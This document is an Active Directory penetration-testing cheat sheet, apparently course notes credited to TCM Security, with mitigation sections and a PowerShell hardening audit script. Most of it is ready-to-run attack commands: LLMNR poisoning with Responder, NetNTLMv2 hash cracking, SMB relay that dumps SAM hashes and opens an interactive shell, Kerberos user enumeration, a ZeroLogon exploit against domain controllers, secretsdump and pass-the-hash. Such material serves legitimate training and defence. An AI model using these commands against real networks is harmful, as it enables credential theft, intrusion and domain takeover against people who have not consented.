Resources


LLMNR Attack


RESPONDER

Principle

exploit-llmnr-principle.png Credit: TCM Security

Hands On

responder -I tun0 -dw
Capture NTLM hashes when a DNS lookup fails and the host falls back to LLMNR/NBT-NS.

tool-responder-llmnr_hash_capture.png

hashcat -a 0 -m 5600 myHashes.txt /usr/share/wordlists/rockyou.txt
Crack NetNTLMv2 hashes.

Mitigation

  • Disable LLMNR and NBT-NS
    • Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client > Multicast Name Resolution > OFF
    • Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced > WINS > NetBIOS over TCP/IP > Disable
  • If these cannot be disabled:
    • Network Access Control.
    • Enforce strong user passwords (over 14 characters) to make captured hashes harder to crack.

Credit: TCM Security

SMB Relay Attack


IMPACKET NTLMRELAYX

Principle

Relay captured NTLM authentication to an SMB server without cracking the hashes.

Requirements & Limitations

  • SMB Signing must be disabled on the target.
  • The relayed user must be a local admin on the target.
  • A user cannot be relayed back to the machine the authentication came from.

Scan for vulnerable hosts (SMB Signing disabled)

nmap --script=smb2-security-mode.nse -p445 [TARGET_IP]
Scan for disabled SMB Signing.

tool-nmap-smb_signing.png

Hands on

Capture Hashes

Update the Responder configuration so it still poisons name resolution but no longer answers SMB itself (the relay tool will handle SMB).

/usr/share/responder/Responder.conf

[Responder Core]

; Servers to start
SQL = On
; SMB server turned off so ntlmrelayx can handle the SMB authentication
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off

responder -I tun0 -dw
Capture NTLM hashes when a DNS lookup fails and the host falls back to LLMNR/NBT-NS.

tool-responder-llmnr_hash_capture.png

Relay Attacks

python3 /opt/impacket/examples/ntlmrelayx.py -tf myTargets.txt -smb2support --no-multirelay
Relay the NTLM authentication to the listed targets and dump their SAM hashes.

tool-ntlmrelayx-smb_relay_dump_sam.png.png

** /!\ TO CHECK /!\ **

python3 /opt/impacket/examples/ntlmrelayx.py -tf myTargets.txt -smb2support --no-multirelay -i
Relay the NTLM authentication and start an interactive bind shell.

tool-ntmlrelayx-smb_relay_reverse_shell.png

nc 127.0.0.1 11000
Connect to the shell.

Mitigation

  • Enable SMB Signing on all devices
    • Warning: May cause performance issues with file copies
  • Disable NTLM authentication on the network
    • Warning: NTLM is the fallback when Kerberos does not work, and some applications may still require it.
  • Limit high-privilege accounts to specific tasks (e.g. Domain Admins only log in when Domain Admin access is required).
  • Restrict local admin accounts.
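
A PowerShell audit of the mitigations listed here and in the LLMNR section above (added example, not from the original notes or TCM Security): it reads the registry values the "Multicast Name Resolution" policy and the per-adapter NetBIOS setting write, checks whether SMB signing is required rather than merely enabled, and applies all three with -Remediate. Assumptions: run elevated on a Windows host; the registry paths are the standard locations for those settings.

```powershell
param([switch]$Remediate)   # re-run with -Remediate to apply the fixes

# --- LLMNR: the "Turn off multicast name resolution" policy writes EnableMulticast = 0 ---
$llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
$llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
if ($Remediate -and $llmnr -ne 0) {
    New-Item -Path $llmnrKey -Force | Out-Null
    Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord
    $llmnr = 0
}

# --- NBT-NS: per-adapter NetbiosOptions (0 = use DHCP setting, 1 = enabled, 2 = disabled) ---
# Anything other than 2 is reported as "still on": 0 leaves the decision to DHCP, which usually keeps NetBIOS enabled.
$ifaceKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
$nbtLeftOn = foreach ($iface in Get-ChildItem -Path $ifaceKey) {
    $opt = (Get-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
    if ($opt -ne 2) {
        if ($Remediate) { Set-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -Value 2 -Type DWord }
        else { $iface.PSChildName }
    }
}

# --- SMB signing: EnableSecuritySignature only negotiates; relay is blocked only when signing is *required* ---
if ($Remediate) {
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
}
$srv = Get-SmbServerConfiguration
$cli = Get-SmbClientConfiguration

# Summary object: every field should read True (and the adapter list should be empty) on a hardened host
[pscustomobject]@{
    LLMNR_Disabled        = ($llmnr -eq 0)
    NBTNS_Disabled        = (-not $nbtLeftOn)
    NBTNS_AdaptersStillOn = (@($nbtLeftOn) -join ',')
    SMBServer_SigningReq  = $srv.RequireSecuritySignature
    SMBClient_SigningReq  = $cli.RequireSecuritySignature
}
```

A NetBIOS setting pushed by DHCP (option 0) can still be re-enabled on a new lease, so on domain hosts prefer setting it centrally rather than per machine.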

Credit: TCM Security

Find Valid Users


KERBRUTE (Brute Force)

kerbrute -dc-ip [TARGET_DC_IP] -domain [TARGET_DOMAIN] -users myUserList.txt -t 10
Find valid users by testing every username in a list (-t sets the number of threads).


IMPACKET GETNPUSERS (Users No Pre-Auth Required)

python3 /opt/impacket/examples/GetNPUsers.py [TARGET_DOMAIN]/myUser -dc-ip [TARGET_DC_IP] -no-pass
Check for users that do not require Kerberos pre-authentication.

Exploit


ZeroLogon Exploit (CVE-2020-1472)

Warning

This exploit could destroy the Domain Controller if you don’t restore the password after the attack.

Check if Vulnerable

https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py myNetBIOSDCName [TARGET_DC_IP]
Check whether the target is vulnerable to CVE-2020-1472.

Hands On

Exploit

https://github.com/Sq00ky/Zero-Logon-Exploit/blob/master/zeroLogon-NullPass.py

python3 zeroLogon-NullPass.py myNetBIOSDCName [TARGET_DC_IP]
Run the exploit: bypass authentication and change the password to an empty value.

Hash Dump

python3 /opt/impacket/examples/secretsdump.py myNetBIOSDCName\$@[TARGET_DC_IP] -no-pass
Connect with empty password (after Zerologon exploit) and dump hashes.

Pass the Hash

evil-winrm -i [TARGET_IP] -u [myUser] -H [myUserNTHASH]
Pass the Hash attack (NT Hash).

Restore the machine state

python3 /opt/impacket/examples/secretsdump.py Administrator@[TARGET_DC_IP] -hashes myAdminHash
Dump the secrets and note the plain_password_hex value.

https://github.com/dirkjanm/CVE-2020-1472

python3 restorepassword.py DOMAIN/myNetBIOSDCName@myNetBIOSDCName -target-ip [TARGET_DC_IP] -hexpass myPlainPasswordHex
Restore the password.